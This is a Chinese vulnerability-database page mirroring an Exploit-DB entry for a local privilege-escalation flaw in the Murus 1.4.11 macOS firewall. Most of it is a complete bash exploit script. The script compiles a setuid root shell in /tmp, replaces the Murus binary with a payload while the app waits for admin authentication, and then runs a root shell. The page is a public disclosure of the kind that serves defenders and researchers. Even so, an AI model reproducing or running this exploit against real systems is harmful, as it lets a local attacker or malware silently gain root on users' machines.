漏洞概要

漏洞标题:
Murus 1.4.11 – Local Privilege Escalation

提交时间:
2017-12-06

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 11 人关注

漏洞详情

EDB-ID: 43217 Author: Mark Wadham Published: 2017-12-06
CVE: N/A Type: Local Platform: macOS
Aliases:
N/A
Advisory/Source: Link Tags:
Local

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:

Download Vulnerable Application
# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.

# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
# without the user knowing.

# https://m4.rkw.io/murus1.4.11.sh.txt
# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
# -------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Murus 1.4.11 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################

echo "compiling payloads..."

cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp /tmp/murus411_exp.c

if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
	echo "failed to compile, dev tools may not be installed"
  exit 1
fi

rm -f /tmp/murus411_exp.c

cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c

echo "waiting for loader..."

while :
do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
    break
  fi
done

echo "planting payload..."

mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus

echo "waiting for payload to trigger..."

while :
do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
done

echo "kapow"

/tmp/murus411_exp

发表评论

电子邮件地址不会被公开。 必填项已用*标注